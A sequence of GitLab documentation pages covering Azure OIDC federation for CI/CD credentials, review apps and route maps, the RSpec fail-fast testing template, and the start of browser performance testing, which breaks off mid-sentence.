
If this is not possible, for example if your GitLab instance is in an offline environment, see how to [configure a non-public GitLab instance](#configure-a-non-public-gitlab-instance).
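To check what STS sees, fetch your discovery document yourself (for example, `curl --fail "https://gitlab.example.com/.well-known/openid-configuration"`) and confirm the `issuer` and `jwks_uri` fields point at publicly resolvable addresses. A sketch that parses a minimal, hand-written stand-in for the fetched document:

```shell
# Minimal stand-in for the fetched discovery document; in practice, pipe curl output to jq.
CONFIG='{"issuer":"https://gitlab.example.com","jwks_uri":"https://gitlab.example.com/oauth/discovery/keys"}'
ISSUER="$(printf '%s' "${CONFIG}" | jq -r '.issuer')"
JWKS_URI="$(printf '%s' "${CONFIG}" | jq -r '.jwks_uri')"
echo "${ISSUER} ${JWKS_URI}"
```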
---
stage: Software Supply Chain Security
group: Pipeline Security
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Configure OpenID Connect in Azure to retrieve temporary credentials
---
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< alert type="warning" >}} `CI_JOB_JWT_V2` was [deprecated in GitLab 15.9](../../../update/deprecations.md#old-versions-of-json-web-tokens-are-deprecated) and is scheduled to be removed in GitLab 17.0. Use [ID tokens](../../yaml/_index.md#id_tokens) instead. {{< /alert >}} This tutorial demonstrates how to use a JSON web token (JWT) in a GitLab CI/CD job to retrieve temporary credentials from Azure without needing to store secrets. To get started, configure OpenID Connect (OIDC) for identity federation between GitLab and Azure. For more information on using OIDC with GitLab, read [Connect to cloud services](../_index.md). Prerequisites: - Access to an existing Azure Subscription with `Owner` access level. - Access to the corresponding Azure Active Directory Tenant with at least the `Application Developer` access level. - A local installation of the [Azure CLI](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli). Alternatively, you can use all the following steps with the [Azure Cloud Shell](https://portal.azure.com/#cloudshell/). - Your GitLab instance must be publicly accessible over the internet, because Azure must be able to connect to the GitLab OIDC endpoint. - A GitLab project. To complete this tutorial: 1. [Create Azure AD application and service principal](#create-azure-ad-application-and-service-principal). 1. [Create Azure AD federated identity credentials](#create-azure-ad-federated-identity-credentials). 1. [Grant permissions for the service principal](#grant-permissions-for-the-service-principal). 1. [Retrieve a temporary credential](#retrieve-a-temporary-credential). For more information about Azure identity federation, see [workload identity federation](https://learn.microsoft.com/en-us/entra/workload-id/workload-identity-federation).
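As a preview of where these steps lead: once the federated identity credentials exist, a CI/CD job can sign in with the Azure CLI's `--federated-token` support. A rough sketch, where `AZURE_CLIENT_ID` and `AZURE_TENANT_ID` are hypothetical CI/CD variables you would define to hold the application (client) ID and tenant ID:

```yaml
azure auth:
  id_tokens:
    GITLAB_OIDC_TOKEN:
      aud: https://gitlab.example.com
  script:
    - az login --service-principal --username "${AZURE_CLIENT_ID}" --tenant "${AZURE_TENANT_ID}" --federated-token "${GITLAB_OIDC_TOKEN}"
    - az account show
```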
## Create Azure AD application and service principal

To create an [Azure AD application](https://learn.microsoft.com/en-us/cli/azure/ad/app?view=azure-cli-latest#az-ad-app-create)
and service principal:

1. In the Azure CLI, create the AD application:

   ```shell
   appId=$(az ad app create --display-name gitlab-oidc --query appId -otsv)
   ```

   Save the `appId` (Application client ID) output, as you need it later to configure your GitLab CI/CD pipeline.

1. Create a corresponding [Service Principal](https://learn.microsoft.com/en-us/cli/azure/ad/sp?view=azure-cli-latest#az-ad-sp-create):

   ```shell
   az ad sp create --id $appId --query appId -otsv
   ```

Instead of the Azure CLI, you can [use the Azure Portal to create these resources](https://learn.microsoft.com/en-us/entra/identity-platform/howto-create-service-principal-portal).

## Create Azure AD federated identity credentials

To create the federated identity credentials for the previous Azure AD application
for a specific branch in `<mygroup>/<myproject>`:

```shell
objectId=$(az ad app show --id $appId --query id -otsv)

cat <<EOF > body.json
{
  "name": "gitlab-federated-identity",
  "issuer": "https://gitlab.example.com",
  "subject": "project_path:<mygroup>/<myproject>:ref_type:branch:ref:<branch>",
  "description": "GitLab service account federated identity",
  "audiences": [
    "https://gitlab.example.com"
  ]
}
EOF

az rest --method POST --uri "https://graph.microsoft.com/beta/applications/$objectId/federatedIdentityCredentials" --body @body.json
```

For issues related to the values of `issuer`, `subject`, or `audiences`, see the [troubleshooting](#troubleshooting) details.

Optionally, you can now verify the Azure AD application and the Azure AD federated identity credentials from the Azure Portal:

1. Open the [Azure Active Directory App Registration](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/RegisteredApps)
   view and select the appropriate app registration by searching for the display name `gitlab-oidc`.
1. On the overview page, verify details like the `Application (client) ID`, `Object ID`, and `Tenant ID`.
1. Under `Certificates & secrets`, go to `Federated credentials` to review your Azure AD federated identity credentials.

### Create credentials for any branch or any tag

To create credentials for any branch or tag (wildcard matching), you can use
[flexible federated identity credentials](https://learn.microsoft.com/entra/workload-id/workload-identities-flexible-federated-identity-credentials).

For all branches in `<mygroup>/<myproject>`:

```shell
objectId=$(az ad app show --id $appId --query id -otsv)

cat <<EOF > body.json
{
  "name": "gitlab-federated-identity",
  "issuer": "https://gitlab.example.com",
  "subject": null,
  "claimsMatchingExpression": {
    "value": "claims['sub'] matches 'project_path:<mygroup>/<myproject>:ref_type:branch:ref:*'",
    "languageVersion": 1
  },
  "description": "GitLab service account federated identity",
  "audiences": [
    "https://gitlab.example.com"
  ]
}
EOF

az rest --method POST --uri "https://graph.microsoft.com/beta/applications/$objectId/federatedIdentityCredentials" --body @body.json
```

For all tags in `<mygroup>/<myproject>`:

```shell
objectId=$(az ad app show --id $appId --query id -otsv)

cat <<EOF > body.json
{
  "name": "gitlab-federated-identity",
  "issuer": "https://gitlab.example.com",
  "subject": null,
  "claimsMatchingExpression": {
    "value": "claims['sub'] matches 'project_path:<mygroup>/<myproject>:ref_type:tag:ref:*'",
    "languageVersion": 1
  },
  "description": "GitLab service account federated identity",
  "audiences": [
    "https://gitlab.example.com"
  ]
}
EOF

az rest --method POST --uri "https://graph.microsoft.com/beta/applications/$objectId/federatedIdentityCredentials" --body @body.json
```

## Grant permissions for the service principal

After you create the credentials, use [`role assignment`](https://learn.microsoft.com/en-us/cli/azure/role/assignment?view=azure-cli-latest#az-role-assignment-create)
to grant permissions to the previous service principal so it can access the Azure resources:

```shell
az role assignment create --assignee $appId --role Reader --scope /subscriptions/<subscription-id>
```

You can find your subscription ID in:

- The [Azure Portal](https://learn.microsoft.com/en-us/azure/azure-portal/get-subscription-tenant-id#find-your-azure-subscription).
- The [Azure CLI](https://learn.microsoft.com/en-us/cli/azure/manage-azure-subscriptions-azure-cli#get-the-active-subscription).

The previous command grants read-only permissions to the entire subscription. For more information
on applying the principle of least privilege in the context of your organization, read
[Best practices for Azure AD roles](https://learn.microsoft.com/en-us/entra/identity/role-based-access-control/best-practices).

## Retrieve a temporary credential

After you configure the Azure AD application and federated identity credentials,
the CI/CD job can retrieve a temporary credential by using the
[Azure CLI](https://learn.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-login):

```yaml
default:
  image: mcr.microsoft.com/azure-cli:latest

variables:
  AZURE_CLIENT_ID: "<client-id>"
  AZURE_TENANT_ID: "<tenant-id>"

auth:
  id_tokens:
    GITLAB_OIDC_TOKEN:
      aud: https://gitlab.com
  script:
    - az login --service-principal -u $AZURE_CLIENT_ID -t $AZURE_TENANT_ID --federated-token $GITLAB_OIDC_TOKEN
    - az account show
```

The CI/CD variables are:

- `AZURE_CLIENT_ID`: The [application client ID you saved earlier](#create-azure-ad-application-and-service-principal).
- `AZURE_TENANT_ID`: Your Azure Active Directory tenant ID. You can
  [find it by using the Azure CLI or Azure Portal](https://learn.microsoft.com/en-us/entra/fundamentals/how-to-find-tenant).
- `GITLAB_OIDC_TOKEN`: An OIDC [ID token](../../yaml/_index.md#id_tokens).
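If `az login` fails, a common cause is a mismatch between the federated identity credential's subject and the `sub` claim GitLab puts in the token. A small sketch to assemble the expected value for comparison (the group, project, and branch names below are placeholders):

```shell
# Build the `sub` claim string GitLab generates for a branch pipeline, so you
# can diff it against your federated identity credential's subject.
# Placeholder values; substitute your own.
group="gitlab-group"
project="gitlab-project"
branch="main"
expected_subject="project_path:${group}/${project}:ref_type:branch:ref:${branch}"
echo "$expected_subject"
```

Compare this string character-for-character with the `subject` you posted to the Graph API when you created the credential.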
## Troubleshooting

### "No matching federated identity record found"

If you receive the error `ERROR: AADSTS70021: No matching federated identity record found for presented assertion.`,
you should verify:

- The `Issuer` defined in the Azure AD federated identity credentials, for example `https://gitlab.com`
  or your own GitLab URL.
- The `Subject identifier` defined in the Azure AD federated identity credentials, for example
  `project_path:<mygroup>/<myproject>:ref_type:branch:ref:<branch>`.
  - For the `gitlab-group/gitlab-project` project and `main` branch, it would be:
    `project_path:gitlab-group/gitlab-project:ref_type:branch:ref:main`.
  - The correct values of `mygroup` and `myproject` can be retrieved by checking the URL when
    accessing your GitLab project or, in the upper-right corner of the project's overview page,
    selecting **Code**.
- The `Audience` defined in the Azure AD federated identity credentials, for example `https://gitlab.com`
  or your own GitLab URL.

You can review these settings, as well as your `AZURE_CLIENT_ID` and `AZURE_TENANT_ID` CI/CD variables, from the Azure Portal:

1. Open the [Azure Active Directory App Registration](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/RegisteredApps)
   view and select the appropriate app registration by searching for the display name `gitlab-oidc`.
1. On the overview page, verify details like the `Application (client) ID`, `Object ID`, and `Tenant ID`.
1. Under `Certificates & secrets`, go to `Federated credentials` to review your Azure AD federated identity credentials.

Review [Connect to cloud services](../_index.md) for further details.

### `Request to External OIDC endpoint failed` message

If you receive the error `ERROR: AADSTS501661: Request to External OIDC endpoint failed.`,
you should verify that your GitLab instance is publicly accessible from the internet.
Azure must be able to access the following GitLab endpoints to authenticate with OIDC:

- `GET /.well-known/openid-configuration`
- `GET /oauth/discovery/keys`

If you update your firewall and still receive this error,
[clear the Redis cache](../../../administration/raketasks/maintenance.md#clear-redis-cache) and try again.

### `No matching federated identity record found for presented assertion audience` message

If you receive the error `ERROR: AADSTS700212: No matching federated identity record found for presented assertion audience 'https://gitlab.com'`,
you should verify that your CI/CD job uses the correct `aud` value. The `aud` value should match the
audience used to [create the federated identity credentials](#create-azure-ad-federated-identity-credentials).
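To check the `sub` and `aud` claims your job actually presents, you can base64url-decode the middle segment of the ID token. The sketch below builds a fake token locally just to demonstrate the decoding (assumes GNU coreutils `base64`); in a real job you would decode `$GITLAB_OIDC_TOKEN` the same way, taking care not to print real tokens in shared logs:

```shell
# Demonstration only: construct a fake JWT payload, then decode it the way
# you would inspect a real ID token's claims.
claims='{"sub":"project_path:gitlab-group/gitlab-project:ref_type:branch:ref:main","aud":"https://gitlab.com"}'
payload=$(printf '%s' "$claims" | base64 | tr -d '=\n' | tr '/+' '_-')
token="fake-header.${payload}.fake-signature"

# Decode the payload segment: restore the standard base64 alphabet and padding.
seg=$(printf '%s' "$token" | cut -d '.' -f 2 | tr '_-' '/+')
while [ $(( ${#seg} % 4 )) -ne 0 ]; do seg="${seg}="; done
decoded=$(printf '%s' "$seg" | base64 -d)
echo "$decoded"
```

The decoded JSON shows exactly which `aud` value Azure receives, so you can compare it with the `audiences` you configured.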
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
description: Set up and use review apps to create temporary environments for testing changes before merging.
title: Review apps
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

Review apps are temporary testing environments that are created automatically for each branch or
merge request. You can preview and validate changes without needing to set up a local development
environment.

Built on [dynamic environments](../environments/_index.md#create-a-dynamic-environment), review apps
provide a unique environment for each branch or merge request.

![Merged result pipeline status with link to the review app](img/review_apps_preview_in_mr_v16_0.png)

These environments help streamline the development workflow by:

- Eliminating the need for local setup to test changes.
- Providing consistent environments for all team members.
- Enabling stakeholders to preview changes with a URL.
- Facilitating faster feedback cycles before changes reach production.

{{< alert type="note" >}}

If you have a Kubernetes cluster, you can set up review apps automatically using
[Auto DevOps](../../topics/autodevops/_index.md).

{{< /alert >}}

## Review app workflow

A review app workflow could be similar to:

```mermaid
%%{init: { "fontFamily": "GitLab Sans" }}%%
flowchart TD
    accTitle: Review app workflow
    accDescr: Diagram showing how review apps fit into the GitLab development workflow.

    subgraph Development["Development"]
        TopicBranch["Create topic branch"]
        Commit["Make code changes"]
        CreateMR["Create merge request"]
    end

    subgraph ReviewAppCycle["Review app cycle"]
        direction LR
        Pipeline["CI/CD pipeline runs"]
        ReviewApp["Review app deployed"]
        Testing["Review and testing"]
        Feedback["Feedback provided"]
        NewCommits["Address feedback with new commits"]
    end

    subgraph Deployment["Deployment"]
        Approval["Merge request approved"]
        Merge["Merged to default branch"]
        Production["Deployed to production"]
    end

    TopicBranch --> Commit
    Commit --> CreateMR
    CreateMR --> Pipeline
    Pipeline --> ReviewApp
    ReviewApp --> Testing
    Testing --> Feedback
    Feedback --> NewCommits
    NewCommits --> Pipeline
    Testing --> Approval
    Approval --> Merge
    Merge --> Production

    classDef devNode fill:#e1e1e1,stroke:#666,stroke-width:1px
    classDef reviewNode fill:#fff0dd,stroke:#f90,stroke-width:1px
    classDef finalNode fill:#d5f5ff,stroke:#0095cd,stroke-width:1px

    class TopicBranch,Commit,CreateMR devNode
    class Pipeline,ReviewApp,Testing,Feedback,NewCommits reviewNode
    class Approval,Merge,Production finalNode
```

## Configure review apps

Configure review apps when you want to provide a preview environment of your application for each
branch or merge request.

Prerequisites:

- You must have at least the Developer role for the project.
- You must have CI/CD pipelines available in the project.
- You must set up the infrastructure to host and deploy the review apps.

To configure review apps in your project:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Build > Pipeline editor**.
1. In your `.gitlab-ci.yml` file, add a job that creates a
   [dynamic environment](../environments/_index.md#create-a-dynamic-environment). You can use a
   [predefined CI/CD variable](../variables/predefined_variables.md) to differentiate each environment.
   For example, using the `CI_COMMIT_REF_SLUG` predefined variable:

   ```yaml
   review_app:
     stage: deploy
     script:
       - echo "Deploy to review app environment"
       # Add your deployment commands here
     environment:
       name: review/$CI_COMMIT_REF_SLUG
       url: https://$CI_COMMIT_REF_SLUG.example.com
     rules:
       - if: $CI_COMMIT_BRANCH && $CI_COMMIT_BRANCH != $CI_DEFAULT_BRANCH
   ```

1. Optional. Add `when: manual` to the job to only deploy review apps manually.
1. Optional. Add a job to [stop the review app](#stop-review-apps) when it's no longer needed.
1. Enter a commit message and select **Commit changes**.

### Use the review apps template

GitLab provides a built-in template that's configured for merge request pipelines by default.

To use and customize this template:

1. On the left sidebar, select **Search or go to** and find your project.
1. Select **Operate > Environments**.
1. Select **Enable review apps**.
1. From the **Enable Review Apps** dialog that appears, copy the YAML template:

   ```yaml
   deploy_review:
     stage: deploy
     script:
       - echo "Add script here that deploys the code to your infrastructure"
     environment:
       name: review/$CI_COMMIT_REF_NAME
       url: https://$CI_ENVIRONMENT_SLUG.example.com
     rules:
       - if: $CI_PIPELINE_SOURCE == "merge_request_event"
   ```

1. Select **Build > Pipeline editor**.
1. Paste the template into your `.gitlab-ci.yml` file.
1. Customize the template based on your deployment needs:
   - Modify the deployment script and environment URL to work with your infrastructure.
   - Adjust [the rules section](../jobs/job_rules.md) if you want to trigger review apps for
     branches even without merge requests.
   For example, for a deployment to Heroku:

   ```yaml
   deploy_review:
     stage: deploy
     image: ruby:latest
     script:
       - apt-get update -qy
       - apt-get install -y ruby-dev
       - gem install dpl
       - dpl --provider=heroku --app=$HEROKU_APP_NAME --api-key=$HEROKU_API_KEY
     environment:
       name: review/$CI_COMMIT_REF_NAME
       url: https://$HEROKU_APP_NAME.herokuapp.com
       on_stop: stop_review_app
     rules:
       - if: $CI_PIPELINE_SOURCE == "merge_request_event"
   ```

   This configuration sets up an automated deployment to Heroku whenever a pipeline runs for a
   merge request. It uses Ruby's `dpl` deployment tool to handle the process, and creates a dynamic
   review environment that can be accessed through the specified URL.

1. Enter a commit message and select **Commit changes**.

### Stop review apps

You can configure your review apps to be stopped either manually or automatically to conserve
resources. For more information about stopping environments for review apps, see
[Stopping an environment](../environments/_index.md#stopping-an-environment).

#### Auto-stop review apps on merge

To configure review apps to automatically stop when the associated merge request is merged or the
branch is deleted:

1. Add the [`on_stop`](../yaml/_index.md#environmenton_stop) keyword to your deployment job.
1. Create a stop job with the [`environment:action: stop`](../yaml/_index.md#environmentaction) keyword.
1. Optional. Add [`when: manual`](../yaml/_index.md#when) to the stop job to make it possible to
   manually stop the review app at any time.

For example:

```yaml
# In your .gitlab-ci.yml file
deploy_review:
  # Other configuration...
  environment:
    name: review/${CI_COMMIT_REF_NAME}
    url: https://${CI_ENVIRONMENT_SLUG}.example.com
    on_stop: stop_review_app  # References the stop_review_app job

stop_review_app:
  stage: deploy
  script:
    - echo "Stop review app"
    # Add your cleanup commands here
  environment:
    name: review/${CI_COMMIT_REF_NAME}
    action: stop
  when: manual  # Makes this job manually triggerable
  rules:
    - if: $CI_PIPELINE_SOURCE == "merge_request_event"
```

#### Time-based automatic stop

To configure review apps to stop automatically after a period of time, add the
[`auto_stop_in`](../yaml/_index.md#environmentauto_stop_in) keyword to your deployment job:

```yaml
# In your .gitlab-ci.yml file
review_app:
  script: deploy-review-app
  environment:
    name: review/$CI_COMMIT_REF_SLUG
    auto_stop_in: 1 week  # Stops after one week of inactivity
  rules:
    - if: $CI_MERGE_REQUEST_ID
```

## View review apps

To deploy and access review apps:

1. Go to your merge request.
1. Optional. If the review app job is manual, select **Run** ({{< icon name="play" >}}) to trigger
   the deployment.
1. When the pipeline finishes, select **View app** to open the review app in your browser.
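The environment names and URLs in the previous configurations rely on `CI_COMMIT_REF_SLUG`. As a rough approximation (a sketch of documented behavior, not GitLab's exact implementation), the slug is the branch name lowercased, with characters outside `a-z0-9` replaced by `-`, truncated to 63 characters, and stripped of leading and trailing `-`:

```shell
# Approximate CI_COMMIT_REF_SLUG derivation (sketch; GitLab's real rules may
# differ in edge cases such as truncation boundaries).
ref_name="Feature/Add-Login_Page"
slug=$(printf '%s' "$ref_name" \
  | tr '[:upper:]' '[:lower:]' \
  | sed -e 's/[^a-z0-9]/-/g' \
  | cut -c1-63 \
  | sed -e 's/^-*//' -e 's/-*$//')
echo "$slug"
```

This can help you predict the review app URL a branch will get, for example when configuring DNS wildcards for `*.example.com`.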
## Example implementations

These projects demonstrate different review app implementations:

| Project | Configuration file |
|---------|--------------------|
| [NGINX](https://gitlab.com/gitlab-examples/review-apps-nginx) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-examples/review-apps-nginx/-/blob/b9c1f6a8a7a0dfd9c8784cbf233c0a7b6a28ff27/.gitlab-ci.yml#L20) |
| [OpenShift](https://gitlab.com/gitlab-examples/review-apps-openshift) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-examples/review-apps-openshift/-/blob/82ebd572334793deef2d5ddc379f38942f3488be/.gitlab-ci.yml#L42) |
| [HashiCorp Nomad](https://gitlab.com/gitlab-examples/review-apps-nomad) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-examples/review-apps-nomad/-/blob/ca372c778be7aaed5e82d3be24e98c3f10a465af/.gitlab-ci.yml#L110) |
| [GitLab Documentation](https://gitlab.com/gitlab-org/technical-writing/docs-gitlab-com) | [`build.gitlab-ci.yml`](https://gitlab.com/gitlab-org/technical-writing/docs-gitlab-com/-/blob/bdbf11814428a06e82d7b712c72b5cb53c750f29/.gitlab/ci/build.gitlab-ci.yml#L73-76) |
| [`https://about.gitlab.com/`](https://gitlab.com/gitlab-com/www-gitlab-com/) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-com/www-gitlab-com/-/blob/6ffcdc3cb9af2abed490cbe5b7417df3e83cd76c/.gitlab-ci.yml#L332) |
| [GitLab Insights](https://gitlab.com/gitlab-org/gitlab-insights/) | [`.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab-insights/-/blob/9e63f44ac2a5a4defc965d0d61d411a768e20546/.gitlab-ci.yml#L234) |

Other examples of review apps:

- <i class="fa-youtube-play" aria-hidden="true"></i>
  [Cloud Native Development with GitLab](https://www.youtube.com/watch?v=jfIyQEwrocw).
- [Review apps for Android](https://about.gitlab.com/blog/2020/05/06/how-to-create-review-apps-for-android-with-gitlab-fastlane-and-appetize-dot-io/).
## Route maps

Route maps let you navigate directly from source files to their corresponding public pages in the
review app environment. This feature makes it easier to preview specific changes in your merge
requests.

When configured, route maps add contextual links that let you view the review app version of files
that match your mapping patterns. These links appear in:

- The merge request widget.
- Commit and file views.

### Configure route maps

To set up route maps:

1. Create a file in your repository at `.gitlab/route-map.yml`.
1. Define mappings between source paths (in your repository) and public paths (on your review app
   infrastructure or website).

The route map is a YAML array where each entry maps a `source` path to a `public` path. Each mapping
in the route map follows this format:

```yaml
- source: 'path/to/source/file'  # Source file in repository
  public: 'path/to/public/page'  # Public page on the website
```

You can use two types of mapping:

- Exact match: String literals enclosed in single quotes.
- Pattern match: Regular expressions enclosed in forward slashes.

For pattern matching with regular expressions:

- The regex must match the entire source path (`^` and `$` anchors are implied).
- You can use capture groups `()` that can be referenced in the `public` path.
- Reference capture groups using `\N` expressions in order of occurrence (`\1`, `\2`, and so on).
- Escape slashes (`/`) as `\/` and periods (`.`) as `\.`.

GitLab evaluates mappings in order of definition. The first `source` expression that matches
determines the `public` path.
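To see how a single pattern-match rule rewrites a path, here is a sketch with `sed`. It mimics a blog-post style rule; because POSIX extended regex has no lazy `+?`, the sketch uses `[^.]+` for the post name, so it is an approximation of the route-map syntax rather than GitLab's actual matcher:

```shell
# Rewrite a source path using capture groups \1..\4, similar to a route-map
# pattern rule (approximation; not GitLab's matcher).
source_path="source/posts/2017-01-30-around-the-world-in-6-releases.html.md.erb"
public_path=$(printf '%s\n' "$source_path" \
  | sed -E 's|^source/posts/([0-9]{4})-([0-9]{2})-([0-9]{2})-([^.]+)\..*$|\1/\2/\3/\4/|')
echo "$public_path"
```

Running a candidate path through your rules like this is a quick way to sanity-check a mapping before committing `.gitlab/route-map.yml`.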
### Example route map

The following example shows a route map for [Middleman](https://middlemanapp.com), a static site
generator used for the [GitLab website](https://about.gitlab.com):

```yaml
# Team data
- source: 'data/team.yml'  # data/team.yml
  public: 'team/'  # team/

# Blogposts
- source: /source\/posts\/([0-9]{4})-([0-9]{2})-([0-9]{2})-(.+?)\..*/  # source/posts/2017-01-30-around-the-world-in-6-releases.html.md.erb
  public: '\1/\2/\3/\4/'  # 2017/01/30/around-the-world-in-6-releases/

# HTML files
- source: /source\/(.+?\.html).*/  # source/index.html.haml
  public: '\1'  # index.html

# Other files
- source: /source\/(.*)/  # source/images/blogimages/around-the-world-in-6-releases-cover.png
  public: '\1'  # images/blogimages/around-the-world-in-6-releases-cover.png
```

In this example:

- The mappings are evaluated in order.
- The third mapping ensures that `source/index.html.haml` matches `/source\/(.+?\.html).*/` instead
  of the catch-all `/source\/(.*)/`. This produces a public path of `index.html` instead of
  `index.html.haml`.

### View mapped pages

Use route maps to navigate directly from source files to their corresponding pages in your review app.

Prerequisites:

- You must have configured route maps in `.gitlab/route-map.yml`.
- A review app must be deployed for your branch or merge request.

To view mapped pages from the merge request widget:

1. In the merge request widget, select **View app**. The dropdown list shows up to 5 mapped pages
   (with filtering if more are available).

![Merge request widget with route maps showing matched items and filter bar.](img/mr_widget_route_maps_v17_11.png)

To view a mapped page from a file:

1. Go to a file that matches your route map using one of these methods:
   - From a merge request: In the **Changes** tab, select **View file @ [commit]**.
   - From a commit page: Select the filename.
   - From a comparison: When comparing revisions, select the filename.
1. On the file's page, select **View on [environment-name]** ({{< icon name="external-link" >}})
   in the upper-right corner.

To view mapped pages from a commit:

1. Go to a commit that has a review app deployment:
   - For branch pipelines: Select **Code > Commits** and select a commit with a pipeline badge.
   - For merge request pipelines: In your merge request, select the **Commits** tab and select a commit.
   - For merged results pipelines: In your merge request, select the **Pipelines** tab and select
     the pipeline commit.
1. Select the review app icon ({{< icon name="external-link" >}}) next to a filename that matches
   your route map. The icon opens the corresponding page in your review app.

{{< alert type="note" >}}

Merged results pipelines create an internal commit that merges your branch with the target branch.
To access review app links for these pipelines, use the commit from the **Pipelines** tab, not the
**Commits** tab.

{{< /alert >}}
https://docs.gitlab.com/ci/fail_fast_testing
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/fail_fast_testing.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
fail_fast_testing.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Fail Fast Testing
null
{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

For applications that use RSpec for running tests, we've introduced the `Verify/FailFast`
[template to run subsets of your test suite](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates/Verify/FailFast.gitlab-ci.yml),
based on the changes in your merge request.

The template uses the [`test_file_finder` (`tff`) gem](https://gitlab.com/gitlab-org/ruby/gems/test_file_finder)
that accepts a list of files as input, and returns a list of spec (test) files
that it believes to be relevant to the input files.

`tff` is designed for Ruby on Rails projects, so the `Verify/FailFast` template is
configured to run when changes to Ruby files are detected. By default, it runs in
the [`.pre` stage](../yaml/_index.md#stage-pre) of a GitLab CI/CD pipeline, before
all other stages.

## Example use case

Fail fast testing is useful when adding new functionality to a project and adding
new automated tests.

Your project could have hundreds of thousands of tests that take a long time to complete.
You may expect a new test to pass, but you have to wait for all the tests to complete
to verify it. This could take an hour or more, even when using parallelization.

Fail fast testing gives you a faster feedback loop from the pipeline. It lets you
know quickly that the new tests are passing and the new functionality did not
break other tests.

## Prerequisites

This template requires:

- A project built in Rails that uses RSpec for testing.
- CI/CD configured to:
  - Use a Docker image with Ruby available.
  - Use [Merge request pipelines](../pipelines/merge_request_pipelines.md#prerequisites).
- [Merged results pipelines](../pipelines/merged_results_pipelines.md#enable-merged-results-pipelines)
  enabled in the project settings.
The template uses `image: ruby:2.6` by default, but you [can override](../yaml/includes.md#override-included-configuration-values) this. ## Configuring Fast RSpec Failure We use the following plain RSpec configuration as a starting point. It installs all the project gems and executes `rspec`, on merge request pipelines only. ```yaml rspec-complete: stage: test rules: - if: $CI_PIPELINE_SOURCE == "merge_request_event" script: - bundle install - bundle exec rspec ``` To run the most relevant specs first instead of the whole suite, [`include`](../yaml/_index.md#include) the template by adding the following to your CI/CD configuration: ```yaml include: - template: Verify/FailFast.gitlab-ci.yml ``` To customize the job, specific options may be set to override the template. For example, to override the default Docker image: ```yaml include: - template: Verify/FailFast.gitlab-ci.yml rspec-rails-modified-path-specs: image: custom-docker-image-with-ruby ``` ### Example test loads For illustrative purposes, our Rails app spec suite consists of 100 specs per model for ten models. If no Ruby files are changed: - `rspec-rails-modified-paths-specs` does not run any tests. - `rspec-complete` runs the full suite of 1000 tests. If one Ruby model is changed, for example `app/models/example.rb`, then `rspec-rails-modified-paths-specs` runs the 100 tests for `example.rb`: - If all of these 100 tests pass, then the full `rspec-complete` suite of 1000 tests is allowed to run. - If any of these 100 tests fail, they fail quickly, and `rspec-complete` does not run any tests. The final case saves resources and time as the full 1000 test suite does not run.
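The selection step in the example above can be sketched roughly as follows. This is a simplified illustration of the fail-fast idea (changed file → candidate spec file); `tff` itself uses richer heuristics for real Rails projects:

```python
def specs_for(changed_files):
    """Map changed Ruby files to the spec files likely to cover them.

    Hypothetical helper for illustration only, not tff's actual logic.
    """
    specs = []
    for path in changed_files:
        if path.startswith("app/") and path.endswith(".rb"):
            # app/models/example.rb -> spec/models/example_spec.rb
            specs.append("spec/" + path[len("app/"):-len(".rb")] + "_spec.rb")
        elif path.startswith("spec/") and path.endswith("_spec.rb"):
            # A changed spec file is itself the relevant spec.
            specs.append(path)
    return specs

print(specs_for(["app/models/example.rb", "README.md"]))
# ['spec/models/example_spec.rb']
```

With one changed model, only its 100 specs run in `.pre`; the full 1000-test suite runs only if that subset passes.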
https://docs.gitlab.com/ci/browser_performance_testing
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/browser_performance_testing.md
2025-08-13
doc/ci/testing
[ "doc", "ci", "testing" ]
browser_performance_testing.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Browser Performance Testing
null
{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

If your application offers a web interface and you're using
[GitLab CI/CD](../_index.md), you can quickly determine the rendering performance
impact of pending code changes in the browser.

{{< alert type="note" >}}

You can automate this feature in your applications by using
[Auto DevOps](../../topics/autodevops/_index.md).

{{< /alert >}}

GitLab uses [Sitespeed.io](https://www.sitespeed.io), a free and open source tool,
for measuring the rendering performance of web sites. The
[Sitespeed plugin](https://gitlab.com/gitlab-org/gl-performance) that GitLab built
outputs the performance score for each page analyzed in a file called
`browser-performance.json`. This data can be shown on merge requests.

## Use cases

Consider the following workflow:

1. A member of the marketing team is attempting to track engagement by adding a new tool.
1. With browser performance metrics, they see how their changes are impacting the usability
   of the page for end users.
1. The metrics show that after their changes, the performance score of the page has gone down.
1. When looking at the detailed report, they see the new JavaScript library was included
   in `<head>`, which affects loading page speed.
1. They ask for help from a frontend developer, who sets the library to load asynchronously.
1. The frontend developer approves the merge request, and authorizes its deployment to production.

## How browser performance testing works

First, define a job in your `.gitlab-ci.yml` file that generates the
[Browser Performance report artifact](../yaml/artifacts_reports.md#artifactsreportsbrowser_performance).
GitLab then checks this report, compares key performance metrics for each page
